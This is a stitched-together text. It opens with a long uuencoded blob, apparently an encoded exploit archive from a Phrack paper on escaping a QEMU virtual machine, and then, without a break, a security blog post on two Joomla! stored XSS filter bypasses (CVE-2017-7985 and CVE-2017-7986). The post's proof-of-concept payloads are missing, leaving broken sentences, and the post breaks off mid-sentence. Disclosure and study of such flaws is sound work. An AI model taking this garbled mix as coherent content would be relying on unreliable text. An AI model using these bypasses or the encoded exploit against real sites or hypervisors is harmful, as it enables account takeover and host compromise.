MYE.;L=$G"S&!;>C+#GMST5I$FU%^$CHA>H>RMS35=]5L04W,7,R7;VNR=O/3 MB_DBZQ2XS"]7ZP^D0EXMN6-X>=R;BX*\/Q<-\^+Y,A\H0G9U\ZH!VZ9'J9D> M90_YR[[Q*OMF3=F>:*+ZLH>>VUHK)*%L<;/W(K-+)(&ERM<.5*O0T&@/(VHW MMD&`[1TDR=X9$I'>P[4R%P9G,U]F^4UO"=VP*M#=H969VN&5F;5@J"C$&4-4 M+.9+Z,W_])!165_+BWB=9[0[G\%.&^GR;K6`57^1&]AF`T0S"G?Z7GURO.UL M[+MHC>=%J)D(LV71282:7G8-C<Y/-"V;KY130[NU\^5);][J>M.?F:_7C<K$ M>JU4A>NU^IF^7FUXKV+H/K2B]%0VQ6^ZOF7Q)M96R74U:08?,A1ZZ;>V5N(C M=JD=ZE7?3I2AE=W(5LN\N0=F"R6E5=4^#WL9O\UG\_4_7MKGG:JH,\IW70>, MVM;II67:[KF^4+4";RV$2[DLA+UHV/>UNB3_$O/?5UIZGQH%Z7<>)//E@_+B M3D.67%U\$$^*3#J"[AM3F-5O\R6;8K^;KS?72]CVW4\Q)^;71)MUO"P7;&I^ M#22?;^9Y2;=[XV.Z?\O'=/*@P55=O.NT2?:B;C1E&??D!",TU8D+I'N^W[%0 M?1]_*&><"<0CP\;I7)@7\B\X_L"`\-TQIY1X/2Z&>DE-$3_@3+"F9WVKM3'! M'S3%*=GXTECRMWOW<)"F$\0+;<6D0R@WG0!:^5MY'(?%JL>%Z>753*4;MTK0 M13:2?R8JC528J3`C-*:',<[XGKR$1X&YDWF;7[<D^>9]#KQZL8*ZXN5KX_4U M-!%+G<%$??#?>#+"]Q*7P*'O<C:)0A,`QH'E>".$3VIBUC255_/E,:Z+1IRF MP.S*I3UUN[R$(9IO)D/+`7<7OAP_Q&43*,H_<+ED22-R<V%8!+CP8(,S8G4Y M3V<I;`+6DP,NA(TY,F:S1R^>?O?-5[.S)]\^^ON3QPV27,Z0,?&5(QS1C00A M`/0(!M#`C-*(2^/R.KT@&58:5ZNRG*.9CGA9LQ322.WLCK.T,I_E)DR4U6Y* MEJQ#=#KJ&/?RI(;5'0`%YD4NYK7XO6:*FD=&_`[H2>9&++WW,MI.[#V8TBC2 M[H;,CO;>7^"Z.*GHBU9),^@\;J>WD)GF/\DX94`?*@-Z:/QD/'A`%D\&K`>8 M`0![:N,T9M?'1HT.W\O^;.0@>:GY#5!EXK1!J%%*62""<7!@?*9,+7Z=>^O& M[/V\S_]4.+1KA['`PCGJ!:L\02$AJ&CL&!V.\ST%=1-FCQ83X]YIG8J)^-2I MG:90OIG5'9E370=1R#7YT:Q@ZRY^)@C8Q*8,=(VER;>0?DO.A>$64[)5_<>/ M8G[##U7RL@I(97C2^B#'-[C]_6KYQ4;N+:Z7L#?!XI!Q`6POGXS5=>(&Z1?Q M/+7BES*]X/KYLI_I9=/_=7Q/+/A0F1R_C._%R6D+W],D;(/T\/VGLWV%>)CM MQ1CT<GZ7Z1$Q3,MEF_'E:+;Y?-Y-4H@_P/J\L&YA_7KUU;*^AKV+>%'^0OZ6 M784:<$XK+"URB*NW:*+WZP.;/,M.Y1?8S[>S#B4@-(18J_=$OJ?P&S9--!K% M&L^A!?&<7-P%VN.'Q.35+^)JK.1(/BN![X<TTDAFQ/%0T%?%</R0I4>5AN<* MPL*4(L\1@ECXZ`0HI;P:JK6_^]OT]/]J\C4[W:1DU><^RE4^-IJDJ"2'2F$N M5XU9B[R]@R;(C:R_G>2D3!>7M<"OM`W?K(SU-:PK!1XN/E_/KPQZ![U:H!2F MP:@T`Q.-7F&J_*#!DAK_C;&9H?38S&A7L9F19H?4-/,EM*1\:9\?H2ZH^@X% MQ/>3[I@C*MY;3AD1KSOQ^C4"H.I`;=;Q0VKT$1'"0)4!C4FC!&I8F.I,-#%I M&V6`[/?%)4=]MH19UBB$I\6C_3VM]@D_XOGCD?'=H\=_FSU^^O73L_]#PJ13 M%79UPM0A+RO:?$&R_@*"CE3%G*93MTODS$5,VR:I:0;C1NY3X*#J3X'#=E)) M`#YH0W-SAK*AUH%L1DZWI&+B6><2)_O-$7/0/)>X*%E.1TQF'&0IT:ZCTN+= M)YTGH=U2D!6@5-.6DC35-7,7B8J7>Y-#WFW2-.Z4H+O)2=5IDA,]A6H:#)6J M2:(OA;>5LCX3.-H<*"9KM*"<-5!.UHGE;'TYNL><Z-@?Q0.O1GO55FV83,,$ MJ!N]"YFHE*Y8\U9T<L"2$F45R)%^05)I:C5<3\LI[M?T#>O62++TEU6)RPF) M\%WK!,+\.G4"(@UI4:(#,UDTX.KB5ZU@O/B!',_7<8IJ)5[<C#(G+QSUDL>_ M)QV=_;3ZJNKKV"9FR\JG'+18;&U;XO;WL-="97(@#`DPB8^/D":L!V#S$J^7 M-Y,[+S\[-_+EF]4'XP,^9J2^D4NNXNIZ4TZ4E]YXS,LD%6F1V'%-V'$)N)7$ M[PKYKEQOB_+G+QY_\_WLZV^^??+]TX8TAXRG/[RH<VJ!#CE/SLZJ'*U,GZ^. M'_;*<<SLE]V8*\9M@+\-918SLPZQIJ&PMN"S(:Y2B\O!E>7?K.;+2=T0%97( MJJK5Y%5U2-4EJSI0'PN'JK=Y5BECEQD>J]^BZ@(UML4ZS[_(C*=T^_E,W'8* M'8-063(/T<4P61P0OEEZ<;U\*V=.PU:1-1&5XCP11E@:W41#G`B]!_PY$JKM M*595(<(?L\OXIGE/,2TWJZLCZ7NOKA-+"W6P5-J?2(6]T-:CJEXV#G[>NW<H M-1TOGCY^:I1O8:_]S3-A%%FRTH.=[:E;33HEOYR?WV=S2SB?NRQNH5UX);/! M),U+?.D;0%S0\=F=SS@(\Z6!",2I`YKT+8P9#5AL$.7Q22\:RQO)ATTN&K<G M7`!P">EK`4EC'+2]3%3*#K7L*=%::CB0A"\%*>_=.Z\Z8U7ZC#W$?>]>A4O2 M_6$]6`*7(@`WJQ7IRUG,Y^6&/'!A*TIV;UB=Q@0Z57WR\WXG4UR9M.=GRX9A MHIM2`L>6F2DG:,>N#M`5J^ME]NGPZ[PX5*SSIJ_Q3G!*-X-38:A!WX1A'9W. MDIS?V2HS^\AX4SN1>/3BQ>SYDT=G7_W7)-YLV!$'?,&S<IG'Z_1B<L#5P\EH M`Q5I+3[^\A?,>]4^-;&+BWZ(PRZ(F.;],+BEZX*U;L`.3U[Q-AM[\MDIBSKJ MVMYEO$DO\O(E_3V'];C`20_E3C2Y-%YXIJ@I4!>#F0S??R8G(CI10?.M%A3L M!13@6'.:S8MB5OUF$4`C3AP@1ICJ/U$2H+FL<)`-I5O[/=UD$7]KK4HC]Y#8 M=4[0`K>\GH8495*\SEG8*$EE-TG,OFXR347>W!&)WM".SG@#)*(NP%=)H#V% M)/=.JQZ^D<-P7"<=6R(1P:I)<-H`PI%M@4CJR1'$:NI**V4DYSTDUA%-PV2@ M1#V7`!5L9N@2'___#V)&XZ_LDZ62<&4'A._]2P8I-2""DBTPF7HJ[6@17'[M MHB"J=U!PZJFTO&44_%5%,6W.>DH34D30:8]4*XJ"*I&WT:I9&!GR77R`G<1, M^'Z]S?K?$'2Z5?O77*"KZ^W?8WG&(9J(919?_N"'#_XW02A70$%8*G9,.;IE MM+'$F;7^&GUF93/89,N>H6>BZBY(7@X1B?O<'C&$M!$^V5Z0K(VWEB.#[*VE MV"Y[:S$RS]Y:BJVTMQ83=N1;2I%)]]929+J]M11;<&]O6-,*6^[8Q2Q4;2KD M>5?R5QJO,_$PA'U/PYE@,:G=AQPUG3+=,Z0W''%`7$Q4OQR=TF?-TN\GM;>3 MC[5_DPX8^;\1,,E$>G_Y*%V^=,NS"YG#>GJKCYJD<Y3-35NZU$^>Y`F!F;HZ M$52&8"CY04SA3207-ZM+``U..A?CE^.'V7O3^'BJ>)#ZJ+B)^E@[>?K8<.3T ML;5[4;PW?52=+S6J@:5*(W>PY60X=FH8E7';H6+[)+I<H>*W9%!<]EM`:X&I MMW(JD%Z\.V'()5-5R+PQ^\K`-_/&W3**Z\XH*FO$X+YY8/!QY[5,=,,^O)8H MBXA<%@CMJ7&`?\7N24P<M<0.$TC!*98:&!*VIYRQLJ5RCWBD&_A#3=6,B"K7 M0^!]\L!P-_$T&]F>[^RM3=Z.S7'Y6B;LP6MO$`HXXT2+]^#4^*?><9N^/&#\ MX?E_G;U`)XG=$JUY3IN57S;55;];@_-=];.EF>Z\09F5^5)>+LMQ$W>GK/ZH M]1AL?E%=0FKE`,]2<?LO\4E,\E*1Y2T*9@V/HDLOUJWS\D)OX'2+B_I2#O[` MAA!6IE3N?.KVUPYUKM?K?+E%H5.5WL3KUV+W)YF3#TQP9M7%3B`@]*U60L6Y MO#R4=0IT>&?887";^1MW:A7X_!SG83U#_FF>[*M:G)!WB14`ZC<.-;A=17:\ MD0<\VA!.A'^A-^=H[&N[N$N?3GACZ0`#S0\/\4B$Y:>3VEX9*N6M(.;_>&I4 M6+B@R",&Q.PW?$LB]2CWS@T:*92E/#[W[]^_(T(_+"GV@Q@U1N0>&6[+XEF\ M,E5V%+KGIU/^.SC6W5>@4_%R]+9@XG$I318A"T7]70&L-I,%,'\_?D@NT4[9 M7=='<J%U4H7$J,J@PYX[KV[B^-5-DKRZ2=-7-UGVZB;/7\$.GB@IBZ[YTA\D M@Y*XT26*7O>*8]$[%<TPQ*:&Z%I!IW*O)@5234GMB/9MGW@]G9>P5E=+*KW7 M3=(EGA&/.Z]GH3F4=W#*YQWY^R/]-DUS^_ZK;A+MOD1A9<'K5%IO>8;$?GM[ MQ"^.4?D%#3QAJ<M=E6=)Z?&/(4MC]1Z?0"0?V#,]L`<?+!F=?)@LO--)\=J5 MH[0:[$;^/A[9=?7H4FK[VB$L^D"0/G_QS'CR_3/CT>/'Z,2.?`3J.DQC:SL$ MRG-_<BS7(?RMS`7ZK<R%O?98"),>;$*Q@$,\DGQ=2G^;?23_*&DN&@][JW@A M/1D0`)U9JKDC5^]'S^1B"9DW83O[\;-JE6S&]='O6^6OFQD_3M+[95"*\8C+ MA.KY//MLF"KITE_#7L.-';9)P;9$-]6N2^8I&G&M_E#74S6=GTSL=2<G?Y4B M27T1-%!\K2\N)J\L(F?AM*I#]E86%=NZAGJ#/#5?7JU7&U0;\R:.-%'X4G.^ M_H=($N^39OA282:/0577BQ2=F?Y3^N.H=QN*I%NLC@QTOR$;0[I4Z;#[_*3O M8DFCAJ6+#_YQ9%3O#@NANR_3U3I7G#"29A7F8:VI_T>Y6F\&M.5'M]'![Z9[ MU^G:8:M1M4THC*O?9>NWHBI6TFH]\6\9_*K%CE!1RH>M!LOTG=WH/0DMKDUV M'3JZ#9P"C6F34U7,U8R__;$0J+*Z6DP<-G#5G[%;=#@RV@)H:"/6V^B6.N:@ M)<0:4DTY8VJU50I:=8GL8#AJG:OZ6RY&HEF<=X+E(L^O)C9]5R]/Q5TXWS8V MKU"!9Z;&BXO\`\C=ZT5&7G'R\FJUI/@RR$)4HN>B?(\6H%H\Z&_+AT9IR;ZE MS"%+1?'A.TPIGJIG@J)V9AS@FYO)L05[7+QS+6(XJ%!'0.R@OU:RS%8N79M' M"[XO^!RV-"!YEYLY++/Z?F.$(#8L`#Z6]=,`H*#3T*%]*\M=J>YAMW9=?@Y4 M.7L+L%HB5V2CINY`M'?`MID0Z8;LP!TIB!!5C?R^N%JB.Q@\D%(@@5-#:35? M-AUWH-3@`B?"+*Z%O-P!>=E!7NZ&7+FN&JQ`ECO60N]4476IM:4B+M>N2*8V M*E(F\7U"!DO,%0RB$J`0@RBP)IX.'NKN`E\=B8@/57HGXD.S%EFNMZ)&!0C< MV<`HM3;RMM2LENVMO5,9VQQ5#[/[[O6&)57%.P*1CGM>S]_A@GQ]=5]A))S@ M?_NN$T*RXJ*Z89.)_$Y*E4-\5XQ_CJ6Y=I,8*E)AZ=1'$MEF(D1[YUB_><:' MR`<R[,A)2_/"[^&[J-OHJ))6G)2#*E!*;?9X,E"J?AFPM10]V2#Q*Q[2ROS6 MH_W:(IHT1KL5%O9M.Y:6YFWUQ25OZ;5@>'6I#$<[K[8LQ8G1]3XT/>058-(= MSGMJ_"'5J8%*5[*G&ZH:Z=JNFITC_8*J"4%OM\5DK%ZX:PL)@UI5W5+15WJ< MT.A>I&.*PVFU0\I637F"NYDV)C@LW!?>R*3D4"6+VA,5A)R585>Z%!I>N'L: M/50/ZF6>G3U],3M[\N@QZ_Y>S/[[[)L73^2/)W]_\E7=YTIZ:_MKJ?UMR'%M M&ZRZKYKI`&),]8OPY9?#G:_+#M5%_97G!^7RK_>$H=6JM4[I+0/'UKWBIZ#> M;$'=55P>-)0+1T9'D6#5V#5PFR:<<KC@E[]M=4A#F]A5C!^HY6^QW92[SF9G M/A5>40;31=A$JB\.-=J="[R[Z'03)J'EB^F?KBZOKC<8\>0?UW/R^K!.F0_H M=D359I[LJ[8OL&$[&/:NB!<.Y[B?PR`315JRI<^]>_68=6Z;*%0U%;W8K):+ MB3(<G455"BT,XTD19)E_YP#64.VA>U[:JBS?-S/.GK^H<`!P^;[<?%AP%!72 M$GH=)2'K$(4*T;304:A&B\AT1?VEO#V1&*T!A*A\TJDD*;-3D0)X,>]O!:[1 M9.S-48"JAO1H1T7/G!Z$ZGFZJ^;>RG0JB';ZZV1'8\NUOEXN<3M9S-?HC62S MP?@WT+77^9UN`P?7K5LO0T;_.JYNX'[EQ6^@SOH]9P^1JF9U=JBRSEOM5NI> M5DR#QG.5GGZ'>>7N,*\(+\Y5?O*#F.4SG^&]IG([-D:8__T_=?SW]%U^;)N6 M=^Q9OO>KQH`?CO_N.('CR/CO?N!8&/_=]MPQ_OOO\1GCOX_QW\?X[V/\]S'^ M^QC_?8S_/L9__^3X[[\X4OJ?)P#W&%][C*\]QM<>XVN/\;7'^-K_CO&UQ_!H M8WBTWR(\VO_G0;7&B$IC1*4QHM(84>G?+*+2&"YF#!?S>X>+^5=%63&RZ\MJ M?XD2+">'R\;-#9IJ""L4JA-21-?(-D;QC]=X2WW2?:N,6:J?*GK/_[EA^<(9 M+2P=RTTQN?-J:=Y\;EK^S5^-._10^-Z<GMC(_,]-^P8RINI#:2Y%Q12\,KP# M_K2Q%JNNQ9`/#.IJ[QR.7@I'+X6CE\+12^'HI7#T4CAZ*1R]%(Y>"O_D7@I' M_W6C_[K1?YUF)S7ZKQO]UXW^ZWZI_[H_EV>>?H\VVYS9C"YH1A<THPN:DW\_ M%S2[J'V'%O\&@2H_EZ@C;M%=77?[!A/:LQA=XHPN<0AL=(DSNL097>*,+G&$ M2YQ;OZ2MWW^N\W?YNLR/TW7ZJ[[^W/;^TS)=WY?O/P,KL/']9^#8X_O/W^.S M[?6,>&13F[>??84NLV'/?W&X9^!7G-OX!Z9U>&C\*%UA4]J/>/=W>"ATEN<< M(/)UOLS7,9ID7I?(47B!_.B'%T\??_.]\<TWL$0O/BQ7E[!&[QO3O9L?'1L$ MR<V/ML]_'/[#B18D<BE+)%C\QZ0_(?T?T/\>_>\R-!?">\9]Q1:4#X:UHW3N MB.WYE3&H>%A#9HU!8`:.&9%)9IZ;N6_9J*FYB2(S\JPD9J/+P,]2UXH(P/3C MP@W)W#*/?"?V'#(#C7+?C;S888`\2\+0(5O-(,K2)(S)K#0W,R^/+#*NC(+, MSJ(P9(`H\=W4ILU6D"=6D"9D>YD'26AG9D``9E)86<1VH%:6!!8P&^W.XL2T MS8)J*YPD"BR73$9#-\E=*V.K3RO.XLP-"*N?95GNYE1;X69NXGED;QHZF1-Z M:<``CI]&(5N]^JZ?Q"&;HQ:9;Q=10$:D8>Q[:92G#.":EI>Z1!D?!(&?9D2Q M(C8+)_/)-#;,S-#,"H\`G,3/;3.EMKJI'UFF1Y3)/-]TK9SZ%MM^@.*$`5+3 MR=V,VNHF)K3<)<IDMIF%7D%]BSTS3CP_80`O\>*PH+:Z=F)'H4^CFR5)DD89 M]2U.D[2(7+;0=>P,BN0.F_="0].`1C=+,]_,4NI;G&26DWD1`=A^%CEF3%@] MH+5I.E1;&F:!9X5$L:3(3-^R?`:P$K<`BK/=<>*DKDVUI4421UY$%$O")(-^ M%`P0FG821FRN6YA>&+*A<.J;0."$1CVQS"2/;#94M@N_"-*0*..%?NBF%EL3 M6]"(+*913WS?MS,G(P`QN]G,5TPLFG!A9MMFDK)]<>99ILW\$%B)%7IAQ-;, MB9]X%E$F*I(B=V/J6QXF8>8ZS`]!:`9I%%-;S<(TBX@-KR/?C.(P9`MFR\RC MT&)^"`H_-F&4V"[:AY;:-+J1!5,QC:AON>\[7BKLHD4K"*N5^JEO^50;3&#/ M@=E!$]'V;=-TF1_\U/0C+R>L5F):L1=0;:%MA@60C`!@#%+78W[PO<3,HM1G MP_`DR",VG@Z3)$_"G"VLTP0X.F!^``)G5I8192POB^W,)8J%:>8$:4&C7B0P MAU.?^<'-$MNW/&JK$R-3IFR&[22I:0;4-V#6Q#%SY@<WSHK8<ZFM3I:%D9<1 M96+@D=3UV9(;6*]P"^8'U_$C$%HQF[7[>185*1MZ^T$8NFR8'OLF#)VP6'=- MU\X":JOCF`[,<!K=.#9C-_6H;UEF9D&:,C]XIND%ED-8[<"T72L6YN8F3%(V M-$\C,P4J,S]X@1\FGDU8;=,O0B^AVI+(]S/7)(JE()9S-V)^\/#%7V029>P( M1B2*B&(P.F84VC3J:9`%<9@(P_TH<9S,(LK8>>+";""*)4&2>:F3L*5]$OMI MS/P@A#>U-8J3(@%!11-1""P2TFYB97;$_)#'F0>;'6IKE&5V$,1$&5.,*`$X M&3!@R/R0.R`@$WY>$+F^ZR0A/SO(_,R/'>I;$/NQ%\?,#[EKYFEA4EM!WD1% M$;%M?FR:<6Y3WP)8)R)8.PA`,!EA#0,SC(&#:"+FI@5\0!3S(]-/;?$JH`A\ MVPL\PAJ:ON?#$D0`D9\ZL*,C@-Q/3#]G?BCRS+62@"@31IECPQ#S8X(L#J#E M!!!DF1NGS`]%E$09R"8"R),\ATX00``CD;L.*QH2,\PSY@=!#&IK;&56Y`1$ M&2?,PM1.J6]ND16%[3$_9%:2^$%!;8W])(6Y191QBL0S8=$C@#"Q'=]E?LA@ M,;)!UA)`8<8@FVET'=]TW+B@OKFPM86Q8'Z`]IMYD5);XQ"Z5W@TNH[EYV'. MCS!@(QPE><#\D":^E3@A84U2'R:`1;7!?J3([)@HYL%XY-`H!DC--`@BPIHD M9N(&)M4&DMBV_(0HYGDFP-C,#ZF7@(#@YQP)=,9,;**8G22N%T?\J"5-'!"H MS`\I,'11Q$29Q,M,$$5$,1N6DPC$-@$D61[G%O.#V)M06_/4=PK;)LH$GA_' M3D1],\5"R`"I"5,KIK;FB8FSG2@3V+"3"D)^-B,D!0-X2>'&(;4UA]4NB"T: MW2`!)DEBZILI2,D`=F:'>41MS;W,@[E'HQND69H7"?7-3+(D*VSF![&&$%;8 M1;FY[5)M?IAEB5,0Q:PBBT/'9WX(K22W8`M#`$!W&^0_`12)&00Y4<P*D\`- M`N8'7)>]."?*%(4)"UA`%/-]TP<!3J-NH0A,/.:'L/"]")B``$+?!EBB&"Q= M25%D-.H6[*+2PF5^$+Q.;<T"$P1-3I1Q<],-'7ZXY$0@I9R4^2$&:MN^3VV% M+8AIP<:``"(_<@.7^N;DP-!!QOP0YYGEQRZU-8/]D1=G-+H@,T'X^-0W)\A" M)RF8'^((>I9[XME3DL!>D$;7#1([+0+J&T@ZKRARY@<Q)H0UC9,XM4.JS8-6 M1[#"T$1T$S=V8E^\5LI,8$?"FF;0;3^BVCP7EJ+`)HK93A;Y0<+\`#/=#V*; MWSVYON7&"5',RWP84WX_9<=^82<1\P.L",`^#E$F=6`_FL=$,2\V80=HT:C# M'MS.BS!C8WGU<#$3/OQJ`UVI^6U;"P]'0T"KNRH<@[0?(3]_G/P2\;0=^I$[ MOTI?`(F5T7C5/*$0J*WNJRA.8W2HWR(ZE+3>T>`1=@ZMBU1U6IPTWUOBL`OJ M(K<4.?XCPJJCTB14/8EXFJE3E(S8R:I)VH&CDDH,G,%:@,]!0ET=-3U2GAJO MEG?(->1A$[&<7#0=40+$&:[K[1KBJZO%!PZ3Q4:/5(F"<T]TUL+.$AUZFU^] ML:#\4[56Q6R>^K5.N4+H17F=IGE9%M>+Q8?*]OU?K;7Y]3ZU_H^]G?P6=0SK M_TS8DY#^#_96I`'\7Z8%)PQGU/_]'A^IUZN4\LKE4JWO@D_LP1&X4@,V;Q-T MQ>W"4HISW.)&!<WB3AJKQ?%BN]F<9G$WRNOB>+>_I>UP`J^*4S3C5OE68VP% M.P7['<3N.D5=G,(;#V)W<Z6K&,!X&+N3*EYER/?X<&."M"Y>YHO6('6&*<_J MXA@G>0MV.%A7Q2E@\G!78P5[^:'<Y)=#C?&\0.EJ(\XR@[6PVPIENC=-3>QP MM';<0'&)I']FK>^)$X:%VC3M0^P>H@%LX/IZV$T'L@,;A:D>MO5*6@>;!78_ M;-@$;</"%EL/6SU`[6^S9UEZV+)1HQ86SJ&_?IM;#\ZUM#+SWX;.RE-U+6SF MUH)LZ!U[%S:`(Z<.5O-4MPOK*\[+!IZ_:]BT\'.K&("M'L=K89,X&H!MO@IO MPZ9..`#;>%/?J3=S0PWSE[I)V1HAQ]7,C%+'"6TVT+%NJ1,9;7FAS(F>5_H] M0BKQVA-"_XB_/1MB3Z'.+@_V.^151/'V!_B:Z1@6??`[L4(2I;]:_0.^`?J7 MAR+63*^N0X`>^,AT-")$[S&@RU5Y;A=./[A&ZK:G.+1^J/:VP&^!^[:6>"V? M!+W@H3<`KEDB6^!)I)EZ?9X--#,G[8`/.3WH3)S8^S.?!^OS'\7Z.<YOKA:K M^>9^^2N>!)%2@>?UV7_@[5#K_.>Y4'P\__T.G[]\]B"9+Q\D<7FQOX\6=?=N MZ,]QOK\_+XR7QO'_&'?N6G>,\_V]S46^1+.H]&(%::;QY56\N3C>K(YQ[WW, MKJT?WA$FUOO%?'^?TT[O6OO[Q?4R)3\?V;R,RY)4ACFE8+9`^ICR\LMD@3J? MNZ(`!D<W'A[8^WMHAWMZ=W+Y%@X25X?DI(1,<X\SX_A-5=ZX*]QL/S3N8K;` MSM]_5IHBRM..I=T@/'ODB\(X?FY4^#X:K]?YE7&_JNBC$;]_:WSQ$RF/C+ON MSU\T\7^X3$!V@C1:I82??A/ZJN5G;>QW7GUYEPN^>GBG78/5JB'[L(POY^E, MU%1UI*XHC0'L:K&IT/_%N#M1&V:(VJ``NN/^HGSPHSE]\."+0UWE=:&_WH4R MS=Z2%<VVII!E8*>K#_^ZM:OHWRTFQUTW\?IU:1Q_\]//PDV%<0==8=RU;NZ` M=/Z)GIQ`CV&B*(/8HC)3!#8T"^-X:5CMRNV?OS@4.'B^$@T/]['U=1I99*(/ M3YJ\0ZH4(+DRUPQ!!.Z28?F'=UHX=/H5J+8[VK6]YB`ZC?ZE!QV7W(*MJY[I MPX8E!Y'IE#=Z9%C2=P>1Z50[>F14<A"73N^CQT5N4(90Z71">E14<A"73F&D MQX4E!U'IE$EZ5%AR$)5.T:1'Q24'D>G44'ID6'(0E4Y%I4=%)8?[J-%?]?21 M2@[37J/=ZJ%]H^0@4IT.#"1/1RXW3:UU&#O-W:8MTU;3A1JFR3:UVO9*R+7K MSG7HU&_;Z]C<H@:=\FA[#374[6IJJ\=VJRF\744Z_=_VBA!J]SIT>L+M=91_ M2'KI=(^[5<10?]3)UM9K[E830PWO"+9I0;4U]4'M6I5>2[2MJB;4\*YIFY)5 M6Y<>ZI85M32R.U:$R;>KIZ4BW+&>"NJ6O6KI>W>L34+=;MG3ZHF'9WQY&XFD M52=OQ[^[5-6JG;=7L/MZJE5/;Z]@^ZY@6(\]Q*`=D)W&?"?M]PZ3K0/9K/U$ MW\UAI?50;_60MZKT]N)6"_D'[.A.*OWAV=J`U-?6RQP#]P#;*E4`=V/$@4N# MW>JJ`&]7GV;/MEM].PO)@0N)G7NVH[@<N+S8K:K=!>?`1<=N56TYC^QR)3+, M;AK`76H<O$49JK$'L$=Z_XDO7_X`G_K^Y[OX+0S?(O_UZ\!;G@'[/],,@M;] MCPLEQON?W^/SU=??/OK/YZ?'KXWCA=`T&<?E)CM-+<LX?CQ[_.3K1S]\BTYY M?CC[ZLG^?KQ8_-5X=WG,DV;DO3_[1Q/_&5C3_1WC/]N.[UEM_K?=8.3_W^,S MQG\>XS^/\9_'^,]C_.<Q_O,8_UGU=/.'"O;\Z9&<6\&*U0"TKAGYK6P1RY@^ M(J!Q5>+QV=]%.F[@ZN072G)-HV^?/GU6)=?FS(___MV+K[]ZSLFU-3=PZ+>R MM/+"Y/'95W][]@B3*92TFOR_OS+H>;&2#+S_'2/!"-@BSB?WJQ%8]^SQLSIX MY]DC\0,?/I\]?\$_7'ZNJ_-Z-#H]&IT>C4Z/1J='H],C`AB='HU.CT:G1Z/3 MH]'IT>CT:'1Z-#H]TC@]$J$.KM(E6WL5\]<RT+OE8ZSVRU66*ZYI#&.]R)>- MA$T[X3).7_KG)PJ6F=1&-\HMXFS],CQ7W>,8ZRI62)U6Q0_I-)CB.:C>=F0, MF*KY&!'E]>:"D[A:>@QS7<J0],U$NU'SY;S9%*4?W!8ZILD><9LX%,'+SI&^ M.K-Y+,=XE>1UQN9=#*7[+$=YO1\LQ)MGR%4;@T]D*"@'AB,>8SV/L9ZUL9X? M3%GYH@LIIT[C&;E:FJ7KM'9&)6,-=7R/#0;M&OV2_19^R4`:+C$.E!P3X9+L M2'HEJ_F(!;P2M$4G^:?\=W`DNP)XNDL<&@V8D.LT%41\,U%_-ZB:VDP.`\/? MCQ_B`@4#0#K-CZ1GY.A-2):J#&HU[KR"L]XKV(F^@IWI*SCKO;K)\U>PP:&( M`+(H+F^D9S25Q(TNL8XGI`^Q)GJGHAF&V-00W5#KJ8R_*(.,U934CFA?2$2. MD3<O9^LZDC8ME4FZ1&%ZW%FXT)$;YAV<TG:PD+\_TF_3-+?'5*R;1!&91&$E MB%VGTCJ,X5`HMW;(0U[LT>DB-%!(<NZJC!RZSM,<I)WPPU<:J_>HK$\^\&TI ML`>'$65T<D]`0Q^:,F1:5TI2M*/=R-_'([M&A.M2:GL\..XZ+I;/7SPSGGS_ MS'CT^#%J^I/YIM1VF,;6=@B4Y_[D6,:6P]_*7*#?RES8:X\%;0^Y"<5B?D4D M7Y<7\&VSZB?Y1TEST?CYZV6\D'&>"(#BD%9S1T;D>_1,!L"#S)NPG?WXV7#D MNX8X5'^HJY&:CN$]3EK@-/C\5;*\>C<T4'RM+RXFARPB1WE:U5'[AU0CY&WS M3KJIRI`$6*R.C(OY;QW538EW)EB[-V2:5BJTJ"!%`ZURT\-6K--/0;W9@KHK M>`\:@W=D=`;*JK%KX#9-."5:FGE85UA/MX8T["[L!VKYH]WC58E/JS.?"J\L M9A2<<R*GV:&&>RYP9]7I)FR?+%]$51/>0IL>3%$,\-Y-E<8G^VJD9O2U.WPP MPPU3VP4OQF.NQZRS%R:?I53T8K-:8FS0REVI#`.'EC!DA,72:@ZE&I((52[$ M/LOWS8RSYR\J'`!<OJ^CV)%0\SHRC46>D'BFA7H!C=!C,J*XE9L]B=$:0(@R M02=!*;-3D0)X,>]OQ7PYWY!]%-KW;>J&]`AST3.G!Z$:#["[*F_E,15$.]MU MHN(3HCF-G_$S?L;/^!D_XV?\C)_Q,W[&S_@9/^-G_(R?\3-^QD_]^7_T`TH, $`$`!```` ` end Sursa: http://phrack.org/papers/vm-escape-qemu-case-study.html
    1 point
  16. Multiple Joomla! Core XSS Vulnerabilities Are Discovered by Zhouyuan Yang | May 04, 2017 | Filed in: Security Research Joomla! is one of the world's most popular content management system (CMS) solutions. It enables users to build custom Web sites and powerful online applications. More than 3 percent of Web sites are running Joomla!, and it accounts for more than 9 percent of CMS market share. As of November 2016, Joomla! had been downloaded over 78 million times. Over 7,800 free and commercial extensions are also currently available from the official Joomla! Extension Directory, and more are available from other sources. This year, as a FortiGuard researcher I discovered and reported two Cross-Site Scripting (XSS) vulnerabilities in Joomla!. They are identified as CVE-2017-7985 and CVE-2017-7986. Joomla! patched them [1] [2] this week. These vulnerabilities affect Joomla! versions 1.5.0 through 3.6.5. They exist because these versions of Joomla! fail to sanitize malicious user input when users post or edit an article. Remote attacker could exploit them to run malicious code in victims’ browser, potentially allowing the attacker to gain control of the victim’s Joomla! account. If the victim has higher permission, like system administrator, the remote attacker could gain full control of the web server. In this blog, I will share the details of these vulnerabilities. Background Joomla! has its own XSS filters. For example, a user with post permission is not allowed to use full HTML elements. When this user posts an article with HTML attributes, Joomla! will sterilize dangerous code like “javascript:alert()”, “background:url()” and so on. Joomla! has two ways to achieve this sterilization. On the client side, it uses the editor called “TinyMCE.” On the server side, it sanitizes the request before storing it on the server. Analysis To demonstrate these vulnerabilities, the test account ‘yzy1’ is created. It has author permission, which is not allowed to use full HTML elements. To bypass the client side sterilization, the attacker can use a network intercept tool like Burp Suite or just change the default editor to other Joomla! built-in editors, like CoodeMirror or None, as shown in Figure 1. Figure 1. Bypassing the client side XSS filter On the server side, I found two ways to bypass the XSS filters. They are identified as CVE-2017-7985 and CVE-2017-7986. CVE-2017-7985 The Joomla! server side XSS filter sterilizes dangerous code and saves the safe characters. For example, when we post the following code with the test account, Joomla! sterilizes it by double quoting the , deleting the , and adding safe links to the URLs, as shown in Figure 2. Figure 2. Joomla! XSS filter But an attacker could take advantage of the filter by trying to let the filter to reconstruct the code and rebuild the scripts. For example, we can add the code Note that the double quote in is the CORRECT DOUBLE QUOTATION MARK, as shown in Figure 3. Figure 3. Inserting the PoC for CVE-2017-7985 When victims access the post, regardless of whether it’s published or not, the inserted XSS code will be triggered in both the main page and the administrator page, as shown in Figures 4 and 5. Figure 4. CVE-2017-7985 PoC triggered in the home page Figure 5. CVE-2017-7985 PoC triggered in the administrator page CVE-2017-7986 When posting an article, the attacker 